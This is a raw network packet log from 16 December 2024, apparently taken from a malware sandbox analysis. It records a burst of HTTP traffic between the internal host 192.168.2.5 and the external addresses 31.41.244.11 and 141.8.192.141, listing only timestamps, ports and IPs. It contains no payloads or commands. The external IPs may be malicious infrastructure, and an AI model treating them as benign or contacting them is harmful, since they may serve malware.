Dec 16, 2024 11:03:32.373250008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.374218941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.374286890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.374367952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.374414921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.375334978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.375400066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.375439882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.375483036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.376409054 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.376471996 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.376471996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.376514912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.377600908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.377715111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.377775908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.378551006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.378601074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.378652096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.378696918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.379667997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.379713058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.379796982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.379842043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.380750895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.380800009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.380928040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.380971909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.381805897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.381998062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.382046938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.382915974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.382963896 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.383155107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.383203983 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.384040117 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.384088039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.384128094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.384171009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.385082960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.385133982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.385195971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.385240078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.386210918 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.386293888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.386342049 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.387258053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.387305021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.387370110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.387418985 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.388313055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.388360977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.388427973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.388473988 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.389384031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.389436007 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.389489889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.390522003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.390657902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.390711069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.391634941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.391684055 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.391783953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.391829014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.392668009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.392713070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.392750978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.392797947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.393728018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.393822908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.393886089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.394870043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.394927979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.395008087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.395052910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.395900011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.395962954 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.396006107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.396058083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.396970987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.397026062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.397068977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.397123098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.398125887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.398190022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.398246050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.399154902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.399209023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.399251938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.399302006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.400249958 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.400305986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.400350094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.400398970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.401310921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.401434898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.401490927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.402448893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.402503967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.402530909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.402576923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.403508902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.403565884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.403606892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.403654099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.404560089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.404617071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.404659033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.404709101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.405653954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.405774117 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.405844927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.406814098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.406888962 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.406964064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.407016039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.407814980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.407866001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.407943010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.407993078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.408898115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.408950090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.409152985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.409207106 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.410001993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.410052061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.410094023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.410142899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.411102057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.411150932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.411187887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.411237001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.412194014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.412244081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.412337065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.412385941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.413240910 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.413294077 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.413336039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.413383961 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.414324999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.414374113 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.414407015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.414453983 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.415417910 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.415467024 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.415529966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.415577888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.416495085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.416544914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.416587114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.416635036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.417553902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.417607069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.417646885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.417697906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.424726963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.424753904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.424906969 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.439918995 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.439984083 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.440095901 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.440145016 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.440157890 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.440200090 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.440223932 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.507035971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.507059097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.507138014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.507353067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.507411957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.507455111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.507508039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.508194923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.508248091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.508287907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.508337021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.509054899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.509118080 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.509128094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.509177923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.509903908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.509958029 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.510004044 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.510055065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.510739088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.510791063 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.510821104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.510873079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.511552095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.511606932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.511682034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.511733055 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.512526035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.512582064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.512589931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.512646914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.513237000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.513290882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.513330936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.513386965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.514054060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.514110088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.514149904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.514200926 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.515558004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.515575886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.515616894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.516128063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.516145945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.516185999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.516221046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.516531944 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.516586065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.516634941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.516686916 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.517307043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.517365932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.517440081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.517493010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.518111944 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.518167973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.518265963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.518321991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.518953085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.519006014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.519046068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.519094944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.519711971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.519764900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.519845009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.519926071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.520518064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.520570993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.520642042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.520729065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.521359921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.521410942 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.521445990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.521497011 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.522114038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.522166014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.522181034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.522233009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.522886038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.522934914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.523001909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.523049116 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.523648024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.523696899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.523830891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.523880959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.524425030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.524473906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.524538994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.524589062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.525211096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.525260925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.525307894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.525357008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.526026964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.526082039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.526129961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.526175976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.526745081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.526799917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.526846886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.526895046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.527529001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.527579069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.527630091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.527679920 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.528268099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.528316975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.528362036 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.528409958 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.529073954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.529102087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.529126883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.529153109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.529793978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.529843092 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.529891968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.529938936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.530540943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.530592918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.530632019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.530679941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.531347036 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.531402111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.531440020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.531490088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.532048941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.532098055 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.532144070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.532191038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.532824993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.532877922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.532939911 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.532988071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.533559084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.533607960 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.533648014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.533699036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.534291983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.534339905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.534363985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.534415007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.535108089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.535155058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.535193920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.535245895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.535769939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.535821915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.535861969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.535912991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.536480904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.536529064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.536569118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.536614895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.537264109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.537292957 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.537317991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.537342072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.537972927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.538002014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.538024902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.538048983 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.538701057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.538752079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.538842916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.538892984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.539463997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.539513111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.539541960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.539592981 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.540132999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.540180922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.540260077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.540307999 CET	49833	80	192.168.2.5	31.41.244.11
